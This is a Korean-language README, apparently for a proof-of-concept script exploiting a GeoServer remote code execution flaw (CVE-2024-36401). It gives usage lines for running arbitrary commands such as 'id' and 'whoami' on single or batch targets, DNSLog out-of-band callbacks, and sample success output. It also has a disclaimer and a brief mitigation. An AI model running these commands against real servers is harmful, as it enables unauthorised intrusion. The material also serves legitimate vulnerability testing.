
본 스크립트는 GeoServer의 원격 코드 실행 취약점(CVE-2024-36401)을 대상으로 개발된 PoC(Proof of Concept) 탐지 도구입니다. 이 취약점은 공격자가 특정 요청을 구성하여 대상 서버에서 임의의 명령을 실행할 수 있도록 합니다.
⚠️ 면책 조항: 이 도구는 보안 연구 및 합법적으로 승인된 테스트 용도로만 제공되며, 불법 용도로 사용해서는 안 됩니다. 사용자는 법적 책임을 스스로 부담해야 합니다.
이 스크립트는 GeoServer의 원격 코드 실행 취약점(CVE-2024-36401)을 위한 PoC(Proof of Concept) 탐지 도구입니다. 이 취약점은 공격자가 특정 요청을 구성하여 대상 서버에서 임의 명령을 실행할 수 있게 합니다.
실행 환경에 다음 의존성이 설치되어 있는지 확인하세요:
requestslxml다음 명령으로 필요한 의존성을 설치할 수 있습니다:
pip install requests lxml
python poc.py -u http://target.com -d dnslog.example.com
또는 실행할 명령 지정:
python poc.py -u http://target.com -c "touch /tmp/vulntest"
여러 대상 URL이 포함된 텍스트 파일 준비(한 줄에 하나씩):
python poc.py -uf targets.txt -d dnslog.example.com
또는 명령 지정:
python poc.py -uf targets.txt -c "id"
자세한 사용 설명: [자세한 사용 설명 문서](취약점 탐지 스크립트 상세 사용 설명서.pdf)
⚠️ 참고:
-d와-c매개변수는 동시에 사용할 수 없습니다.
[INFO] 3개의 유효한 Typenames를 크롤링하여 취약점 탐지 시작
[INFO] 대상: http://example.com
[INFO] 실행 명령: whoami
[INFO] DNSLOG 주소:
[INFO] typeName: topp:states -> whoami 시도 중
[+] 명령이 성공적으로 실행된 것으로 보입니다! 대상: http://example.com 명령: whoami
-c 매개변수를 사용한 명령 실행을 지원합니다./geoserver/wfs 인터페이스에 대한 접근 소스를 제한하세요.이 프로젝트를 개선하는 데 도움이 되는 Issue 또는 Pull Request를 환영합니다.
이 프로젝트는 MIT 라이선스를 따릅니다. 저작권 표시를 유지하는 조건으로 자유롭게 수정, 배포, 상업적 사용이 가능합니다.
| 매개변수 | 설명 |
|---|
-u, --url | 단일 대상 주소 지정 |
-uf, --url-file | 여러 대상 URL이 포함된 파일 경로 지정 |
-d, --dnslog | DNSLog 주소 지정 |
-c, --command | 대상 시스템에서 실행할 명령 지정(예: whoami, id, curl 등) |